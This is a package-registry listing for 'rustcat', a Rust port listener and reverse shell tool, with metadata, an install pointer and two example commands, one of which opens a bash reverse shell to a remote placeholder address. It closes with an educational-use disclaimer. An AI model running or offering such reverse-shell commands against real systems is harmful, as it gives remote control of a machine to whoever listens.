Crates.io | rustcat |
lib.rs | rustcat |
version | 3.0.0 |
source | src |
created_at | 2021-06-06 16:42:24.596009 |
updated_at | 2022-08-15 18:25:08.748742 |
description | The Modern Port Listener and Reverse Shell |
homepage | |
repository | https://github.com/robiot/rustcat |
max_upload_size | |
id | 406937 |
size | 68,252 |
Rustcat is an easy to use port listener and reverse shell for Linux, MacOS, and Windows aimed to be easy to use and accessible.
Check out the Installation Guide. Or if you want to have it portable, check out the latest release
The most basic and useful example to start listening on a port would be (you can even run vim inside rustcat with this):
rcat listen -ib 55600
and to connect:
rcat connect -s bash the.0.0.ip 55600
For some more basic usage, check here
This tool may be used for educational purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.